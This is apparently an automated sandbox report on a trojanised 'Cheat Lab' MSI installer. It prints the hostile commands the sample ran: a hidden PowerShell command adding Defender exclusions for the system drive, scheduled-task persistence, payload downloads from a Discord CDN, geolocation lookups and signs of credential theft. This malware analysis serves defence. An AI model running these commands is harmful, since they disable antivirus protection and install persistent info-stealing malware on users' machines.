                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr
                    String found in binary or memory: https://www.thawte.com/cps0/
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr
                    String found in binary or memory: https://www.thawte.com/repository0W
                    Source: unknown
                    DNS traffic detected: queries for: ip-api.com
                    Source: global traffic
                    HTTP traffic detected: GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
                        User-Agent: Sun
                        Cache-Control: no-cache
                        Host: cdn.discordapp.com
                        Connection: Keep-Alive
                        Cookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000
                    Source: global traffic
                    HTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                        Content-Type: application/json
                        User-Agent: Sun
                        Host: ip-api.com
                        Cache-Control: no-cache
                    Source: global traffic
                    HTTP traffic detected: GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
                        Content-Type: application/json
                        User-Agent: Sun
                        Host: cdn.discordapp.com
                        Cache-Control: no-cache
                    Source: unknown
                    Network traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknown
                    Network traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknown
                    TCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknown
                    HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.8:49710 version: TLS 1.2

                    System Summary

                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                    File dump: connect.exe.9.dr 1074015689
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDAF4022_2_07FDAF40
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDEA3F22_2_07FDEA3F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDF27922_2_07FDF279
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDA20822_2_07FDA208
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDC8E022_2_07FDC8E0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08083D5022_2_08083D50
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0808820022_2_08088200
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A0B2022_2_080A0B20
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A8EC022_2_080A8EC0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A054022_2_080A0540
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A395022_2_080A3950
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A396022_2_080A3960
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A118022_2_080A1180
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080F8C5022_2_080F8C50
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FA00822_2_080FA008
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080F93D022_2_080F93D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081222C022_2_081222C0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081257B222_2_081257B2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081242D422_2_081242D4
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815A02022_2_0815A020
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815A8F022_2_0815A8F0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081529F822_2_081529F8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815F25822_2_0815F258
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815CB4822_2_0815CB48
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08154D9022_2_08154D90
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815C14022_2_0815C140
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815CB3822_2_0815CB38
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08159CD822_2_08159CD8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08154D8022_2_08154D80
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815DE5422_2_0815DE54
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9388D22_2_08D9388D
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9291722_2_08D92917
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9793022_2_08D97930
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D90C9022_2_08D90C90
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D96D7022_2_08D96D70
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9004022_2_08D90040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9325022_2_08D93250
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9533B22_2_08D9533B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D945C822_2_08D945C8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9A6D822_2_08D9A6D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D916D022_2_08D916D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D996C822_2_08D996C8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D96D6022_2_08D96D60
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9244822_2_08D92448
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D945C522_2_08D945C5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963004022_2_09630040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963F0D022_2_0963F0D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E27022_2_0963E270
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963BAB122_2_0963BAB1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_096375A822_2_096375A8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09638E8022_2_09638E80
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E8E822_2_0963E8E8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963F0BF22_2_0963F0BF
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963C3F122_2_0963C3F1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E25F22_2_0963E25F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09638E7022_2_09638E70
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09637A9222_2_09637A92
                    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
                    Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
                    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
                    Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: starttiledata.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                    Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSIBD45.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\66bc0c.msi
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: String function: 00F53292 appears 70 times
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: String function: 00F53790 appears 39 times
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: String function: 00F5325F appears 103 times
                    Source: Cheat.Lab.2.7.2.msi | Binary or memory string: OriginalFilenameviewer.exeF vs Cheat.Lab.2.7.2.msi
                    Source: Cheat.Lab.2.7.2.msi | Binary or memory string: OriginalFilenameaischeduler.dllF vs Cheat.Lab.2.7.2.msi
                    Source: Cheat.Lab.2.7.2.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs Cheat.Lab.2.7.2.msi
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\WVS7RGNO.htm
                    Source: classification engine | Classification label: mal60.troj.spyw.evad.winMSI@30/50@2/4
                    Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Code function: 9_2_00007FF738ABEE80 GetLastError,FormatMessageA
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F345B0 LoadResource,LockResource,SizeofResource
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files\Cheat Lab Inc
                    Source: C:\Windows\Installer\MSIC01A.tmp | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                    Source: C:\Windows\Installer\MSIC01A.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                    Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C
                    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B
                    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000
                    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIC01A.tmp C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
                    Source: C:\Windows\Installer\MSIC01A.tmp | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua""
                    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
                    Source: unknown | Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: unknown | Process created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Process created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Installer\MSIC01A.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAB91.tmp
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Mutant created: \Sessions\1\BaseNamedObjects\Sun713
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Command line argument: PE@22_2_004044A0
                    Source: connect.exe | String found in binary or memory: FVfnl4yeuSiVk+jiJVF0Mr52dH/adDcDoEL+0QvC82BBNvNfiDcOPzSbEn8KbKPFXmSz6flFNV+b2z0Z0nzAmDT941n65Rq3W6uUqPdzrn1rqo0ZhPNJhXpCbZX4iwhntg
                    Source: C:\Windows\System32\msiexec.exe | Automated click: Install
                    Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: OK
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc
                    Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab
                    Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
                    Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                    Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: Cheat.Lab.2.7.2.msi | Static file information: File size 2020352 > 1048576
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: connect.exe, 00000016.00000002.2145496559.00000000081C2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.2.msi, MSIBEB1.tmp.2.dr, 66bc0d.rbs.2.dr, MSIBE81.tmp.2.dr, MSIBF2F.tmp.2.dr, 66bc0c.msi.2.dr

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F5323C push ecx; ret 6_2_00F5324F
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | Code function: 9_2_00007FF738A3499C push rbp; ret 9_2_00007FF738A349D8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe | Code function: 18_2_00007FF6FDFD499C push rbp; ret 18_2_00007FF6FDFD49D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0040A160 push eax; ret 22_2_0040A193
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_00402555 push ecx; ret 22_2_00402568
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CE1094 push eax; iretd 22_2_04CE2549
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEB0DF push ebp; iretd 22_2_04CEB0E2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEB0DB push ebp; iretd 22_2_04CEB0DE
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEB0D9 push ebp; iretd 22_2_04CEB0DA
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEAD10 push edx; iretd 22_2_04CEAD1A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEA94B push eax; iretd 22_2_04CEA952
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_04CEA949 push ecx; iretd 22_2_04CEA94A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_07FD1F12 push eax; ret 22_2_07FD1F21
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0808614D push FFFFFF8Bh; iretd 22_2_08086150
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_080862D0 push esp; ret 22_2_080863D1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0812DC5E push esi; retf 22_2_0812DC61
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0812DD91 push ds; iretd 22_2_0812DDC1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0812DDD2 push ebp; iretd 22_2_0812DDD5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_0812DDD6 pushad ; iretd 22_2_0812DDD9
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_08127DE3 push FFFFFF8Bh; iretd 22_2_08127DEA
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_081295B0 push eax; ret 22_2_081295C3
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_08154AB0 push FFFFFFC3h; ret 22_2_08154AD0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 22_2_00408000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject
                    Source: LuaJIT.exe.2.dr | Static PE information: section name: _RDATA
                    Source: NzEz.exe.9.dr | Static PE information: section name: _RDATA
                    Source: connect.exe.9.dr | Static PE information: section name: .jkqvbz

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSIC01A.tmp
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe | File created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAB91.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAEF5.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAC8E.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAC5E.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAEA5.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBE32.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIC01A.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAD1D.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIACBE.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIBE12.tmp
                    Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIAC3E.tmp
